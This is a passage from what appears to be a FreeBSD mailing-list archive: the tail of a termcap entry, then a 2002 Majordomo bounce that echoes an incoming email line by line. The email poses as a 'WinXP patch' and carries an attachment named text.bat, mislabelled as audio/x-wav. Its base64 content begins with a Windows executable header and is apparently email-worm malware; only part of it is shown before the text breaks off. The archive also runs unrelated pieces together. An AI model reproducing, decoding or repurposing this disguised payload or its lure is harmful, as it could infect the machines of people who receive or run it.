+xterm-color|xterm-co|xterm with ANSI colors:\ + :pa#64:Co#8:AF=\E[3%dm:AB=\E[4%dm:op=\E[39;49m:tc=xterm: # dtterm termcap entry - Obtained from Xinside's CDE with permission # from Thomas Roell dtterm|dtterm-cde10:\ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 22: 1:15 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BC63937B400 for ; Mon, 29 Jul 2002 21:58:40 -0700 (PDT) Received: from dual.ms.mff.cuni.cz (www.freebsd.cz [195.113.19.84]) by mx1.FreeBSD.org (Postfix) with ESMTP id E96CC43E31 for ; Mon, 29 Jul 2002 21:58:33 -0700 (PDT) (envelope-from Majordomo-Owner@freebsd.cz) Received: (from majordom@localhost) by dual.ms.mff.cuni.cz (8.11.6/8.11.1) id g6U4wW687364; Tue, 30 Jul 2002 06:58:32 +0200 (CEST) (envelope-from Majordomo-Owner@freebsd.cz) Date: Tue, 30 Jul 2002 06:58:32 +0200 (CEST) Message-Id: <200207300458.g6U4wW687364@dual.ms.mff.cuni.cz> X-Authentication-Warning: dual.ms.mff.cuni.cz: majordom set sender to Majordomo-Owner@freebsd.cz using -f To: freebsd-bugs@FreeBSD.ORG From: listserv@freebsd.cz Subject: Majordomo results: A WinXP patch Reply-To: listserv@freebsd.cz Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -- >>>> --I37U76Z0eJ0LD880c352022X7p3I8C2S4p **** Command '--i37u76z0ej0ld880c352022x7p3i8c2s4p' not recognized. >>>> Content-Type: text/html; **** Command 'content-type:' not recognized. >>>> Content-Transfer-Encoding: quoted-printable **** Command 'content-transfer-encoding:' not recognized. >>>> >>>> **** Command '' not recognized. >>>> **** Command '' not recognized. >>>> Hello,This is a WinXP patch
**** Command 'hello,this' not recognized. >>>> I wish you would like it. **** Command 'i' not recognized. >>>> >>>> --I37U76Z0eJ0LD880c352022X7p3I8C2S4p **** Command '--i37u76z0ej0ld880c352022x7p3i8c2s4p' not recognized. >>>> Content-Type: audio/x-wav; **** Command 'content-type:' not recognized. >>>> name=text.bat **** Command 'name=text.bat' not recognized. >>>> Content-Transfer-Encoding: base64 **** Command 'content-transfer-encoding:' not recognized. >>>> Content-ID: **** Command 'content-id:' not recognized. >>>> >>>> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g **** Command 'aaaaaaaa2aaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4g' not recognized. >>>> RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn **** Command 're9tig1vzguudq0kjaaaaaaaaaaymx3gxpgts1z4e7nc+bozj+qfs1j4e7pf5b2zt/gts7tn' not recognized. >>>> GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA **** Command 'gbnm+bozpucas1x4e7nc+bkzjfgts7tnglno+boz5p4vs134e7nsawnoxpgtswaaaaaaaaaa' not recognized. >>>> UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA **** Command 'ueuaaewbbac4jrc8aaaaaaaaaadgaa8bcwegaadaaaaakagaaaaaafieaaaaeaaaanaaaaaa' not recognized. >>>> QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA **** Command 'qaaaeaaaabaaaaqaaaaaaaaabaaaaaaaaaaayakaabaaaaaaaaacaaaaaaaqaaaqaaaaabaa' not recognized. >>>> ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'abaaaaaaaaaqaaaaaaaaaaaaaaag1gaazaaaaabqcqaqaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ **** Command 'anaaaowbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaudgv4daaaaeq6aaaaeaaaamaaaaaq' not recognized. >>>> AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaagaabglnjkyxrhaaaieaaaanaaaaagaaaa0aaaaaaaaaaaaaaaaaaa' not recognized. >>>> QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA **** Command 'qaaaqc5kyxrhaaaabf4iaadwaaaauaaaapaaaaaaaaaaaaaaaaaaaeaaamaucnnyywaaabaa' not recognized. >>>> AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaauakaeaaaaabaaqaaaaaaaaaaaaaaaabaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPsFItF **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafwl7ipsfitf' not recognized. >>>> EFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV9H0DiUX0i030uD09PT2Nffxm **** Command 'efnwm/zxm9ujdeyjdfijrfa7drapjw8baaclrfbqa1o7wolv9h0diux0i030ud09pt2nffxm' not recognized. >>>> q4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOkik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UM **** Command 'q4xjqn4vi0uijx38a/clwchpavoli8gjyvokik38isha6akf24hf/3qmi30uhf9+j4vdi3um' not recognized. >>>> K0X4mff/hdJ1G8YEMw1DxgQzCkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDwQACA4QPA4QSK **** Command 'k0x4mff/hdj1g8yemw1dxgqzckodrfgc6wuldqylfrtra4t1da+2rf+lftdwqaca4qpa4qsk' not recognized. >>>> BBCIBDOKRf2K0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L **** Command 'bbcibdokrf2k0epa6gqcyoxbdcgf/34di8mrrfiz9/+f0nuoxgqzdupgbdmkq4nf+akkrf2l' not recognized. >>>> FTDwQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF+Jn3/4XSdQ7G **** Command 'ftdwqaakdw+2ycdgaoomeygmm4pn/orrq8dqbglchduirf90hox/fhqlwytf+jn3/4xsdq7g' not recognized. >>>> BDMNQ8YEMwpDg0X4Ag+2Rf+LFTDwQACKBBCIBDNDg330An8FxkQz/z2A4T+F23Qehf9+GovD **** Command 'bdmnq8yemwpdg0x4ag+2rf+lftdwqackbbcibdndg330an8fxkqz/z2a4t+f23qehf9+govd' not recognized. >>>> K0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bBiw0w8EAAigQIiAQzQ4N99AF/BcZEM/89i3Xs **** Command 'k0x4mff/hdj1dsyemw1dxgqzckodrfgcd7bbiw0w8eaaigqiiaqzq4n99af/bczem/89i3xs' not recognized. >>>> g8YDg23wA4l17OmI/v//X4vDXlvJw1WL7IHsEAEAAINl+ACNRfxQagRoUgJBAOjJIgAAWVlQ **** Command 'g8ydg23wa4l17omi/v//x4vdxlvjw1wl7ihseaeaainl+acnrfxqagrougjbaojjigaawvlq' not recognized. >>>> aAIAAID/FUzQQACFwA+FtwAAAFNWV7uLCUEAUFPo1CIAAFmJRfRZjYXw/v//aAQBAABQ/3X4 **** Command 'aaiaaid/fuzqqacfwa+ftwaaafnwv7ulcueaufpo1ciaafmjrfrzjyxw/v//aaqbaabq/3x4' not recognized. >>>> /3X8/xVQ0EAAhcB1e42F8P7//1DowbUAADP/WTl99H5fV1PoaCIAAFCNhfD+//9Q6GUqAACD **** Command '/3x8/xvq0eaahcb1e42f8p7//1dowbuaadp/wtl99h5fv1poaciaafcnhfd+//9q6guqaacd' not recognized. >>>> xBCFwHQ+aJMLQQD/FfTQQACL8IX2dC1qAmiTDEEA6DciAABZWVBW/xU40UAAhcB0DI2N8P7/ **** Command 'xbcfwhq+ajmlqqd/fftqqacl8ix2dc1qamitdeea6dciaabzwvbw/xu40uaahcb0di2n8p7/' not recognized. >>>> 